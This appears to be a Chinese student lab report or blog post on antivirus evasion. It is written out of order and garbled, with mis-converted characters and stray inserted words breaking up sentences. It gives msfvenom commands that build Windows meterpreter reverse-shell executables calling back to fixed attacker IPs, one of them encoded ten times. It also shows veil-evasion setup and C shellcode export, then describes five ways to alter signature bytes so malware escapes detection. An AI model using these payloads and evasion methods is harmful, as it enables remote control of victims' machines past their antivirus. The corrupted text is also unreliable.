(1)理解免杀技术原理
(2)正确使用msf编码器,veil-evasion,本身利用shellcode编程等免杀工具或技巧;
(成功实现了免杀的。如何作成功的简单语言描述便可,不要截图、指令。与杀软共生的结果验证要截图。)python
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.6.113 LPORT=5329 -f exe > 5329met-encoded.exe
shell
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.15.128 LPORT=5329 -f exe > 5329met-encoded10.exe
编程
apt-get update
apt-get install veil-evasion
use python/meterpreter/rev_tcp
set LHOST 192.168.1.111
generate
5329
1windows
360的检测仍是比较迅速的,在我刚开始运行程序时就获得了报警预示。
接下来咱们用http://r.virscan.org/来进行检测
tcp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.6.113 LPORT=443 -f c
exe文件检测报告:
cpp文件检测报告:
函数
(3)经过组合应用各类技术实现恶意代码免杀
(4)用另外一电脑实测,在杀软开启的状况下,可运行并回连成功,注明电脑的杀软名称与版本
博客内容:工具
3.基于行为的动态分析检测:经过监视恶意代码运行过程。如利用系统监视工具观察恶意代码运行过程时系统环境的变化,或经过跟踪恶意代码执行过程使用的系统函数和指令特征分析恶意代码功能,如出现恶意行为,则属于恶意代码。测试
免杀,字面意思上理解,就是“反-杀毒”,也就是经过必定的手段,使得杀毒工具没法检测出来软件病毒或者木马之类的“干扰性”特征。编码
1.方法一:直接修改特征码的十六进制法
1.修改方法:把特征码所对应的十六进制改为数字差1或差很少的十六进制.code
2.适用范围:必定要精肯定位特征码所对应的十六进制,修改后必定要测试一下能
否正常使用.
2.方法二:修改字符串大小写法
1.修改方法:把特征码所对应的内容是字符串的,只要把大小字互换一下就能够了.
2.适用范围:特征码所对应的内容必需是字符串,不然不能成功.
3.方法三:等价替换法
1.修改方法:把特征码所对应的汇编指令命令中替换成功能类拟的指令.
2.适用范围:特征码中必需有能够替换的汇编指令.好比JN,JNE 换成JMP等.
若是和我同样对汇编不懂的能够去查查8080汇编手册.
4.方法四:指令顺序调换法
1.修改方法:把具备特征码的代码顺序互换一下.
2.适用范围:具备必定的局限性,代码互换后要不能影响程序的正常执行
5.方法五:通用跳转法 1.修改方法:把特征码移到零区域(指代码的空隙处),而后一个JMP又跳回来执行. 2.适用范围:没有什么条件,是通用的改法,强烈建议你们要掌握这种改法.